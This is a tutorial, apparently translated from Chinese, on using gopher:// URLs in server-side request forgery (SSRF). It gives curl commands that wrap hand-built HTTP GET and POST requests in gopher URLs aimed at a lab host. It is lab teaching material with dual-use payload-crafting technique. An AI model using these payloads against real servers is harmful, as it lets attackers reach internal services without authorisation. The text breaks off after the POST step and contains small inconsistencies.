Gopher protocol
This article refers to Margin's article
What is the Gopher protocol?
Definition : Gopher is a very well-known information search system on the Internet. It organizes files on the Internet into a certain index, which can easily bring users from one place on the Internet to another. Before the advent of the WWW, Gopher was the most important information retrieval tool on the Internet, and the Gopher site was also the most important site, using the tcp70 port. But after the emergence of WWW, Gopher lost its former glory. Now it is basically out of date, and people rarely use it anymore;
The gopher protocol supports the sending of GET and POST requests: the get request packet and the post request packet can be intercepted first to form a request that conforms to the gopher protocol. The gopher protocol is the most powerful protocol in the use of ssrf
Restrictions : restrictions on the use of the gopher protocol in various programming languages
Gopher protocol format :
URL:gopher://<host>:<port>/<gopher-path>_后接TCP数据流
- The default port of gopher is 70
- If you initiate a post request, %0d%0a is required for carriage return and line feed. If there are multiple parameters, the & between the parameters also needs to be URL encoded
Gopher sends request HTTP GET request:
Open an nc monitor on the windows side:
Don't know how to use nc? Portal
In kali, use the gopher protocol to send a get request to windows:
C:\root> curl gopher://192.168.1.120:8989/qianxun
The windows side received the response immediately, but the first character was eaten.
C:\root> curl gopher://192.168.1.120:8989/suibianxie
still the same. This is because a character (any character) is added after the URL of the gopher protocol.
So how to send HTTP request? For example, a GET request. At this moment, we think, can’t it be enough to send an original HTTP packet directly? Sending HTTP data in the gopher protocol requires the following three steps:
1. Construct HTTP data packet
2. URL encoding, replace carriage return and change behavior %0d%0a
3. Send gopher protocol
Prepare a PHP code:
<?php
echo "Hello ,".$_GET["name"]."!";
?>
A GET-type HTTP packet is as follows:
GET /ssrf/test/get.php?name=Qianxun HTTP/1.1
Host: 192.168.1.120
After URL encoding:
curl gopher://192.168.1.120:80/_GET%20/ssrf/test/get.php%3fname=Qianxun%20HTTP/1.1%0d%0AHost:%20192.168.1.120%0d%0A
gopher://主机:端口//占位符+http头(需要%0d%0A回车换行)
There are so many pits when converting to URL encoding
1. The question mark (?) needs to be transcoded to URL encoding, that is, %3f.
2. The carriage return and line feed must become %0d%0a, but if you use the tool to transfer directly, there may only be %0a
3. At the end of the HTTP packet To add %0d%0a, it means the end of the message (you can study the end of the HTTP package for details)
Gopher sends request HTTP POST request:
The code of post.php is:
<?php
echo "Hello ,".$_POST["name"]."!"."\n";
?>
Before sending a POST request, take a look at the format of the POST packet
It should be noted that the POST request has 4 parameters as necessary parameters:
POST /ssrf/test/post.php HTTP/1.1
host:192.168.1.120
Content-Type:application/x-www-form-urlencoded
Content-Length:12
name=Qianxun
Then we will URL encode the above POST packet and change it to gopher protocol
curl gopher://192.168.1.120:80/_POST%20/ssrf/test/post.php%20HTTP/1.1%0d%0AHost:192.168.1.120%0d%0AContent-Type:application/x-www-form-urlencoded%0d%0AContent-Length:11%0d%0A%0d%0Aname=Qianxun%0d%0A
Pay attention to the placeholder characters behind the url of gopher.
After using curl to initiate a gopher POST request, the result is:
